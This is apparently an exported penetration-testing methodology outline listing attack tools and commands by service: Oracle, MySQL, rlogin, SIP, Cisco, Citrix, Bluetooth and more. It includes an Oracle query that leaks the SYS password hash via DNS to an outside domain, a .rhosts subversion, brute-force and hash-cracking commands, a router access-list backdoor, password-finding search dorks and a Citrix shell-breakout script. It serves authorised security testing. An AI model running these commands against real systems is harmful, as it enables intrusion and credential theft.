15.14.3.1.7. slapd.conf

15.14.3.2. IBM SecureWay V3 server

15.14.3.2.1. V3.sas.oc

15.14.3.3. Microsoft Active Directory server

15.14.3.3.1. msadClassesAttrs.ldif

15.14.3.4. Netscape Directory Server 4

15.14.3.4.1. nsslapd.sas_at.conf

15.14.3.4.2. nsslapd.sas_oc.conf

15.14.3.5. OpenLDAP directory server

15.14.3.5.1. slapd.sas_at.conf

15.14.3.5.2. slapd.sas_oc.conf

15.14.3.6. Sun ONE Directory Server 5.1

15.14.3.6.1. 75sas.ldif

15.15. PPTP/L2TP/VPN port 500/1723 open

15.15.1. Enumeration

15.15.1.1. ike-scan

15.15.1.2. ike-probe

15.15.2. Brute-Force

15.15.2.1. ike-crack

15.15.3. Reference Material

15.15.3.1. PSK cracking paper

15.15.3.2. SecurityFocus Infocus

15.15.3.3. Scanning a VPN Implementation

15.16. Modbus port 502 open

15.16.1. modscan

15.17. rlogin port 513 open

15.17.1. Rlogin Enumeration

15.17.1.1. Find the files

15.17.1.1.1. find / -name .rhosts

15.17.1.1.2. locate .rhosts

15.17.1.2. Examine Files

15.17.1.2.1. cat .rhosts

15.17.1.3. Manual Login

15.17.1.3.1. rlogin hostname -l username

15.17.1.3.2. rlogin <IP>

15.17.1.4. Subvert the files

15.17.1.4.1. echo ++ > .rhosts

15.17.2. Rlogin Brute force

15.17.2.1. Hydra

15.18. rsh port 514 open

15.18.1. Rsh Enumeration

15.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

15.18.2. Rsh Brute Force

15.18.2.1. rsh-grind

15.18.2.2. Hydra

15.18.2.3. medusa

15.19. SQL Server Port 1433 1434 open

15.19.1. SQL Enumeration

15.19.1.1. piggy

15.19.1.2. SQLPing

15.19.1.2.1. sqlping ip_address/hostname

15.19.1.3. SQLPing2

15.19.1.4. SQLPing3

15.19.1.5. SQLpoke

15.19.1.6. SQL Recon

15.19.1.7. SQLver

15.19.2. SQL Brute Force

15.19.2.1. SQLPAT

15.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

15.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

15.19.2.2. SQL Dict

15.19.2.3. SQLAT

15.19.2.4. Hydra

15.19.2.5. SQLlhf

15.19.2.6. ForceSQL

15.20. Citrix port 1494 open

15.20.1. Citrix Enumeration

15.20.1.1. Default Domain

15.20.1.2. Published Applications

15.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

15.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

15.20.2. Citrix Brute Force

15.20.2.1. bforce.js

15.20.2.2. connect.js

15.20.2.3. Citrix Brute-forcer

15.20.2.4. Reference Material

15.20.2.4.1. Hacking Citrix - the legitimate backdoor

15.20.2.4.2. Hacking Citrix - the forceful way

15.21. Oracle Port 1521 Open

15.21.1. Oracle Enumeration

15.21.1.1. oracsec

15.21.1.2. Repscan

15.21.1.3. Sidguess

15.21.1.4. Scuba

15.21.1.5. DNS/HTTP Enumeration

15.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL

15.21.1.5.2. Untitled

15.21.1.6. WinSID

15.21.1.7. Oracle default password list

15.21.1.8. TNSVer

15.21.1.8.1. tnsver host [port]

15.21.1.9. TCP Scan

15.21.1.10. Oracle TNSLSNR

15.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

15.21.1.11. TNSCmd

15.21.1.11.1. perl tnscmd.pl -h ip_address

15.21.1.11.2. perl tnscmd.pl version -h ip_address

15.21.1.11.3. perl tnscmd.pl status -h ip_address

15.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

15.21.1.12. LSNrCheck

15.21.1.13. Oracle Security Check (needs credentials)

15.21.1.14. OAT

15.21.1.14.1. sh opwg.sh -s ip_address

15.21.1.14.2. opwg.bat -s ip_address

15.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

15.21.1.15. OScanner

15.21.1.15.1. sh oscanner.sh -s ip_address

15.21.1.15.2. oscanner.exe -s ip_address

15.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

15.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

15.21.1.16. NGS Squirrel for Oracle

15.21.1.17. Service Register

15.21.1.17.1. Service-register.exe ip_address

15.21.1.18. PLSQL Scanner 2008

15.21.2. Oracle Brute Force

15.21.2.1. OAK

15.21.2.1.1. ora-getsid hostname port sid_dictionary_list

15.21.2.1.2. ora-auth-alter-session host port sid username password sql

15.21.2.1.3. ora-brutesid host port start

15.21.2.1.4. ora-pwdbrute host port sid username password-file

15.21.2.1.5. ora-userenum host port sid userlistfile

15.21.2.1.6. ora-ver -e (-f -l -a) host port

15.21.2.2. breakable (Targets Application Server Port)

15.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

15.21.2.3. SQLInjector (Targets Application Server Port)

15.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

15.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

15.21.2.4. Check Password

15.21.2.5. orabf

15.21.2.5.1. orabf [hash]:[username] [options]

15.21.2.6. thc-orakel

15.21.2.6.1. Cracker

15.21.2.6.2. Client

15.21.2.6.3. Crypto

15.21.2.7. DBVisualisor

15.21.2.7.1. Sql scripts from pentest.co.uk

15.21.2.7.2. Manual sql input of previously reported vulnerabilties

15.21.3. Oracle Reference Material

15.21.3.1. Understanding SQL Injection

15.21.3.2. SQL Injection walkthrough

15.21.3.3. SQL Injection by example

15.21.3.4. Advanced SQL Injection in Oracle databases

15.21.3.5. Blind SQL Injection

15.21.3.6. SQL Cheatsheets

15.21.3.6.1. Untitled

15.22. NFS Port 2049 open

15.22.1. NFS Enumeration

15.22.1.1. showmount -e hostname/ip_address

15.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

15.22.2. NFS Brute Force

15.22.2.1. Interact with NFS share and try to add/delete

15.22.2.2. Exploit and Confuse Unix

15.22.3. Examine Configuration Files

15.22.3.1. /etc/exports

15.22.3.2. /etc/lib/nfs/xtab

15.22.4. nmap nse script

15.22.4.1. nfs-showmount

15.23. Compaq/HP Insight Manager Port 2301,2381open

15.23.1. HP Enumeration

15.23.1.1. Authentication Method

15.23.1.1.1. Host OS Authentication

15.23.1.1.2. Default Authentication

15.23.1.2. Wikto

15.23.1.3. Nstealth

15.23.2. HP Bruteforce

15.23.2.1. Hydra

15.23.2.2. Acunetix

15.23.3. Examine Configuration Files

15.23.3.1. path.properties

15.23.3.2. mx.log

15.23.3.3. CLIClientConfig.cfg

15.23.3.4. database.props

15.23.3.5. pg_hba.conf

15.23.3.6. jboss-service.xml

15.23.3.7. .namazurc

15.24. MySQL port 3306 open

15.24.1. Enumeration

15.24.1.1. nmap -A -n -p3306 <IP Address>

15.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

15.24.1.3. telnet IP_Address 3306

15.24.1.4. use test; select * from test;

15.24.1.5. To check for other DB's -- show databases

15.24.2. Administration

15.24.2.1. MySQL Network Scanner

15.24.2.2. MySQL GUI Tools

15.24.2.3. mysqlshow

15.24.2.4. mysqlbinlog

15.24.3. Manual Checks

15.24.3.1. Default usernames and passwords

15.24.3.1.1. username: root password:

15.24.3.1.2. testing

15.24.3.2. Configuration Files

15.24.3.2.1. Operating System

15.24.3.2.2. Command History

15.24.3.2.3. Log Files

15.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

15.24.3.2.5. MySQL data directory (Location specified in my.cnf)

15.24.3.2.6. SSL Check

15.24.3.3. Privilege Escalation

15.24.3.3.1. Current Level of access

15.24.3.3.2. Access passwords

15.24.3.3.3. Create a new user and grant him privileges

15.24.3.3.4. Break into a shell

15.24.4. SQL injection

15.24.4.1. mysql-miner.pl

15.24.4.1.1. mysql-miner.pl http://target/ expected_string database

15.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

15.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

15.24.5. References.

15.24.5.1. Design Weaknesses

15.24.5.1.1. MySQL running as root

15.24.5.1.2. Exposed publicly on Internet

15.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

15.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

15.25. RDesktop port 3389 open

15.25.1. Rdesktop Enumeration

15.25.1.1. Remote Desktop Connection

15.25.2. Rdestop Bruteforce

15.25.2.1. TSGrinder

15.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

15.25.2.2. Tscrack

15.26. Sybase Port 5000+ open

15.26.1. Sybase Enumeration

15.26.1.1. sybase-version ip_address from NGS

15.26.2. Sybase Vulnerability Assessment

15.26.2.1. Use DBVisualiser

15.26.2.1.1. Sybase Security checksheet

15.26.2.1.2. Manual sql input of previously reported vulnerabilties

15.26.2.2. NGS Squirrel for Sybase

15.27. SIP Port 5060 open

15.27.1. SIP Enumeration

15.27.1.1. netcat

15.27.1.1.1. nc IP_Address Port

15.27.1.2. sipflanker

15.27.1.2.1. python sipflanker.py 192.168.1-254

15.27.1.3. Sipscan

15.27.1.4. smap

15.27.1.4.1. smap IP_Address/Subnet_Mask

15.27.1.4.2. smap -o IP_Address/Subnet_Mask

15.27.1.4.3. smap -l IP_Address

15.27.2. SIP Packet Crafting etc.

15.27.2.1. sipsak

15.27.2.1.1. Tracing paths: - sipsak -T -s sip:[email protected]

15.27.2.1.2. Options request:- sipsak -vv -s sip:[email protected]

15.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

15.27.2.2. siprogue

15.27.3. SIP Vulnerability Scanning/ Brute Force

15.27.3.1. tftp bruteforcer

15.27.3.1.1. Default dictionary file

15.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

15.27.3.2. VoIPaudit

15.27.3.3. SiVuS

15.27.4. Examine Configuration Files

15.27.4.1. SIPDefault.cnf

15.27.4.2. asterisk.conf

15.27.4.3. sip.conf

15.27.4.4. phone.conf

15.27.4.5. sip_notify.conf

15.27.4.6. <Ethernet address>.cfg

15.27.4.7. 000000000000.cfg

15.27.4.8. phone1.cfg

15.27.4.9. sip.cfg etc. etc.

15.28. VNC port 5900^ open

15.28.1. VNC Enumeration

15.28.1.1. Scans

15.28.1.1.1. 5900^ for direct access.5800 for HTTP access.

15.28.2. VNC Brute Force

15.28.2.1. Password Attacks

15.28.2.1.1. Remote

15.28.2.1.2. Local

15.28.3. Exmine Configuration Files

15.28.3.1. .vnc

15.28.3.2. /etc/vnc/config

15.28.3.3. $HOME/.vnc/config

15.28.3.4. /etc/sysconfig/vncservers

15.28.3.5. /etc/vnc.conf

15.29. Tor Port 9001, 9030 open

15.29.1. Tor Node Checker

15.29.1.1. Ip Pages

15.29.1.2. Kewlio.net

15.29.2. nmap NSE script

15.30. Jet Direct 9100 open

15.30.1. hijetta

16. Password cracking

16.1. Rainbow crack

16.1.1. ophcrack

16.1.2. rainbow tables

16.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

16.2. Ophcrack

16.3. Cain & Abel

16.4. John the Ripper

16.4.1. ./unshadow passwd shadow > file_to_crack

16.4.2. ./john -single file_to_crack

16.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

16.4.4. ./john -show file_to_crack

16.4.5. ./john --incremental:All file_to_crack

16.5. fgdump

16.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

16.6. pwdump6

16.7. medusa

16.8. LCP

16.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

16.9.1. Domain credentials

16.9.2. Sniffing

16.9.3. pwdump import

16.9.4. sam import

16.10. aiocracker

16.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

17. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

17.1. Manual

17.1.1. Patch Levels

17.1.2. Confirmed Vulnerabilities

17.1.2.1. Severe

17.1.2.2. High

17.1.2.3. Medium

17.1.2.4. Low

17.2. Automated

17.2.1. Reports

17.2.2. Vulnerabilities

17.2.2.1. Severe

17.2.2.2. High

17.2.2.3. Medium

17.2.2.4. Low

17.3. Tools

17.3.1. GFI

17.3.2. Nessus (Linux)

17.3.2.1. Nessus (Windows)

17.3.3. NGS Typhon

17.3.4. NGS Squirrel for Oracle

17.3.5. NGS Squirrel for SQL

17.3.6. SARA

17.3.7. MatriXay

17.3.8. BiDiBlah

17.3.9. SSA

17.3.10. Oval Interpreter

17.3.11. Xscan

17.3.12. Security Manager +

17.3.13. Inguma

17.4. Resources

17.4.1. Security Focus

17.4.2. Microsoft Security Bulletin

17.4.3. Common Vulnerabilities and Exploits (CVE)

17.4.4. National Vulnerability Database (NVD)

17.4.5. The Open Source Vulnerability Database (OSVDB)

17.4.5.1. Standalone Database

17.4.5.1.1. Update URL

17.4.6. United States Computer Emergency Response Team (US-CERT)

17.4.7. Computer Emergency Response Team

17.4.8. Mozilla Security Information

17.4.9. SANS

17.4.10. Securiteam

17.4.11. PacketStorm Security

17.4.12. Security Tracker

17.4.13. Secunia

17.4.14. Vulnerabilities.org

17.4.15. ntbugtraq

17.4.16. Wireless Vulnerabilities and Exploits (WVE)

17.5. Blogs

17.5.1. Carnal0wnage

17.5.2. Fsecure Blog

17.5.3. g0ne blog

17.5.4. GNUCitizen

17.5.5. ha.ckers Blog

17.5.6. Jeremiah Grossman Blog

17.5.7. Metasploit

17.5.8. nCircle Blogs

17.5.9. pentest mokney.net

17.5.10. Rational Security

17.5.11. Rational Security

17.5.12. Rise Security

17.5.13. Security Fix Blog

17.5.14. Software Vulnerability Exploitation Blog

17.5.15. Software Vulnerability Exploitation Blog

17.5.16. Taosecurity Blog

18. AS/400 Auditing

18.1. Remote

18.1.1. Information Gathering

18.1.1.1. Nmap using common iSeries (AS/400) services.

18.1.1.1.1. Unsecured services (Port;name;description)

18.1.1.1.2. Secured services (Port;name;description)

18.1.1.2. NetCat (old school technique)

18.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

18.1.1.3. Banners Grabbing

18.1.1.3.1. Telnet

18.1.1.3.2. FTP

18.1.1.3.3. HTTP Banner

18.1.1.3.4. POP3

18.1.1.3.5. SNMP

18.1.1.3.6. SMTP

18.1.2. Users Enumeration

18.1.2.1. Default AS/400 users accounts

18.1.2.2. Error messages

18.1.2.2.1. Telnet Login errors

18.1.2.2.2. POP3 authentication Errors

18.1.2.3. Qsys symbolic link (if ftp is enabled)

18.1.2.3.1. ftp target | quote stat | quote site namefmt 1

18.1.2.3.2. cd /

18.1.2.3.3. quote site listfmt 1

18.1.2.3.4. mkdir temp

18.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

18.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

18.1.2.3.7. dir /temp/qsys/*.usrprf

18.1.2.4. LDAP

18.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

18.1.2.4.2. Tool to browse LDAP

18.1.3. Exploitation

18.1.3.1. CVE References

18.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

18.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

18.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

18.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

18.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

18.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

18.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

18.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

18.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

18.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

18.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

18.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

18.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

18.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

18.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

18.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

18.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

18.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

18.1.3.2. Access with Work Station Gateway

18.1.3.2.1. http://target:5061/WSG

18.1.3.2.2. Default AS/400 accounts.

18.1.3.3. Network attacks (next release)

18.1.3.3.1. DB2

18.1.3.3.2. QSHELL

18.1.3.3.3. Hijacking Terminals

18.1.3.3.4. Trojan attacks

18.1.3.3.5. Hacking from AS/400

18.2. Local

18.2.1. System Value Security

18.2.1.1. Untitled

18.2.1.1.1. Untitled

18.2.1.2. Untitled

18.2.1.2.1. Untitled

18.2.1.3. Untitled

18.2.1.3.1. Untitled

18.2.1.4. Untitled

18.2.1.4.1. Recommended value is 30

18.2.2. Password Policy

18.2.2.1. Untitled

18.2.2.1.1. Untitled

18.2.2.1.2. Untitled

18.2.2.2. Untitled

18.2.2.2.1. Untitled

18.2.2.3. Untitled

18.2.2.3.1. Untitled

18.2.2.4. Untitled

18.2.2.4.1. Untitled

18.2.2.5. Untitled

18.2.3. Audit level

18.2.3.1. Untitled

18.2.3.1.1. Recommended value is *SECURITY

18.2.4. Documentation

18.2.4.1. Users class

18.2.4.1.1. Untitled

18.2.4.2. System Audit Settings

18.2.4.2.1. Untitled

18.2.4.3. Special Authorities Definitions

18.2.4.3.1. Untitled

19. Bluetooth Specific Testing

19.1. Bluescanner

19.2. Bluesweep

19.3. btscanner

19.4. Redfang

19.5. Blueprint

19.6. Bluesnarfer

19.7. Bluebugger

19.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

19.8. Blueserial

19.9. Bloover

19.10. Bluesniff

19.11. Exploit Frameworks

19.11.1. BlueMaho

19.11.1.1. Untitled

19.12. Resources

19.12.1. URL's

19.12.1.1. BlueStumbler.org

19.12.1.2. Bluejackq.com

19.12.1.3. Bluejacking.com

19.12.1.4. Bluejackers

19.12.1.5. bluetooth-pentest

19.12.1.6. ibluejackedyou.com

19.12.1.7. Trifinite

19.12.2. Vulnerability Information

19.12.2.1. Common Vulnerabilities and Exploits (CVE)

19.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

19.12.3. White Papers

19.12.3.1. Bluesnarfing

20. Cisco Specific Testing

20.1. Methodology

20.1.1. Scan & Fingerprint.

20.1.1.1. Untitled

20.1.1.2. Untitled

20.1.1.3. If SNMP is active, then community string guessing should be performed.

20.1.2. Credentials Guessing.

20.1.2.1. Untitled

20.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

20.1.3. Connect

20.1.3.1. Untitled

20.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

20.1.4. Check for bugs

20.1.4.1. Untitled

20.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 

20.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

20.1.5. Further your attack

20.1.5.1. Untitled

20.1.5.1.1. running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  

20.1.5.1.2. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

20.1.5.2. Untitled

20.1.5.2.1. #> access-list 100 permit ip <IP> any

20.2. Scan & Fingerprint.

20.2.1. Port Scanning

20.2.1.1. nmap

20.2.1.1.1. Untitled

20.2.1.2. Other tools

20.2.1.2.1. Untitled

20.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

20.2.2. Fingerprinting

20.2.2.1. Untitled

20.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

20.2.2.2. Untitled

20.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

20.2.2.2.2. Untitled

20.3. Password Guessing.

20.3.1. Untitled

20.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

20.3.1.2. Untitled

20.3.2. Untitled

20.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

20.3.2.2. Untitled

20.3.3. Untitled

20.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

20.3.3.2. Untitled

20.4. SNMP Attacks.

20.4.1. Untitled

20.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

20.4.1.2. Untitled

20.4.2. Untitled

20.4.2.1. onesixytone  -c  SNMP.wordlist  <IP>

20.4.2.2. BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

20.4.3. Untitled

20.4.3.1. snmapwalk  -v  <Version>  -c  <Community string>  <IP>

20.4.3.2. Untitled

20.5. Connecting.

20.5.1. Telnet

20.5.1.1. Untitled

20.5.1.1.1.  telnet  <IP>

20.5.1.1.2. Sample Banners

20.5.2. SSH

20.5.3. Web Browser

20.5.3.1. Untitled

20.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

20.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

20.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

20.5.4. TFTP

20.5.4.1. Untitled

20.5.4.1.1. Untitled

20.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

20.5.4.2. Untitled

20.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

20.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

20.5.4.2.3. Creating backdoors in Cisco IOS using TCL

20.6. Known Bugs.

20.6.1. Attack Tools

20.6.1.1. Untitled

20.6.1.1.1. Untitled

20.6.1.2. Untitled

20.6.1.2.1. Web browse to the Cisco device: http://<IP>

20.6.1.2.2. Untitled

20.6.1.2.3. Untitled

20.6.1.2.4. Untitled

20.6.1.3. Untitled

20.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

20.6.2. Common Vulnerabilities and Exploits (CVE) Information

20.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

20.7. Configuration Files.

20.7.1. Untitled

20.7.1.1. Configuration files explained

20.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

20.7.1.1.2. Untitled

20.7.1.1.3. Untitled

20.7.1.1.4. Password Encryption Utilised

20.7.1.1.5. Untitled

20.7.1.2. Configuration Testing Tools

20.7.1.2.1. Nipper

20.7.1.2.2. fwauto (Beta)

20.8. References.

20.8.1. Cisco IOS Exploitation Techniques

21. Citrix Specific Testing

21.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

21.2. Enumeration

21.2.1. web search

21.2.1.1. Google (GHDB)

21.2.1.1.1. ext:ica

21.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

21.2.1.1.3. [WFClient] Password= filetype:ica

21.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

21.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

21.2.1.1.6. inurl:/Citrix/Nfuse17/

21.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

21.2.1.2. Google Hacks (Author Discovered)

21.2.1.2.1. filetype:ica Username=

21.2.1.2.2. inurl:/Citrix/AccessPlatform/

21.2.1.2.3. inurl:LogonAgent/Login.asp

21.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp

21.2.1.2.5. inurl:/Citrix/NFuse161/login.asp

21.2.1.2.6. inurl:/Citrix/NFuse16

21.2.1.2.7. inurl:/Citrix/NFuse151/

21.2.1.2.8. allintitle:MetaFrame XP Login

21.2.1.2.9. allintitle:MetaFrame Presentation Server Login

21.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

21.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login

21.2.1.3. Yahoo

21.2.1.3.1. originurlextension:ica

21.2.2. site search

21.2.2.1. Manual

21.2.2.1.1. review web page for useful information

21.2.2.1.2. review source for web page

21.2.3. generic

21.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

21.2.3.2. amap -bqv ip_address port_no.

21.2.4. citrix specific

21.2.4.1. enum.pl

21.2.4.1.1. perl enum.pl ip_address

21.2.4.2. enum.js

21.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

21.2.4.3. connect.js

21.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

21.2.4.4. Citrix-pa-scan

21.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

21.2.4.5. pabrute.c

21.2.4.5.1. ./pabrute pubapp list app_list ip_address

21.2.5. Default Ports

21.2.5.1. TCP

21.2.5.1.1. Citrix XML Service

21.2.5.1.2. Advanced Management Console

21.2.5.1.3. Citrix SSL Relay

21.2.5.1.4. ICA sessions

21.2.5.1.5. Server to server

21.2.5.1.6. Management Console to server

21.2.5.1.7. Session Reliability (Auto-reconnect)

21.2.5.1.8. License Management Console

21.2.5.1.9. License server

21.2.5.2. UDP

21.2.5.2.1. Clients to ICA browser service

21.2.5.2.2. Server-to-server

21.2.6. nmap nse scripts

21.2.6.1. citrix-enum-apps

21.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

21.2.6.2. citrix-enum-apps-xml

21.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

21.2.6.3. citrix-enum-servers

21.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

21.2.6.4. citrix-enum-servers-xml

21.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

21.2.6.5. citrix-brute-xml

21.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

21.3. Scanning

21.3.1. Nessus

21.3.1.1. Plugins

21.3.1.1.1. CGI abuses

21.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

21.3.1.1.3. Misc.

21.3.1.1.4. Service Detection

21.3.1.1.5. Web Servers

21.3.1.1.6. Windows

21.3.2. Nikto

21.3.2.1. perl nikto.pl -host ip_address -port port_no.

21.3.2.1.1. Untitled

21.4. Exploitation

21.4.1. Alter default .ica files

21.4.1.1. InitialProgram=cmd.exe

21.4.1.2. InitialProgram=explorer.exe

21.4.2. Enumerate and Connect

21.4.2.1. For applications identified by Citrix-pa-scan

21.4.2.1.1. Pas

21.4.2.2. For published applications with a Citrix client when the master browser is non-public.

21.4.2.2.1. Citrix-pa-proxy

21.4.3. Manual Testing

21.4.3.1. Create Batch File (cmd.bat)

21.4.3.1.1. 1

21.4.3.1.2. 2

21.4.3.2. Host Scripting File (cmd.vbs)

21.4.3.2.1. Option Explicit

21.4.3.2.2. Dim objShell

21.4.3.2.3. objShell.Run "%comspec% /k"

21.4.3.2.4. WScript.Quit

21.4.3.2.5. alternative functionality

21.4.3.3. iKat

21.4.3.3.1. Integrated Kiosk Attack Tool

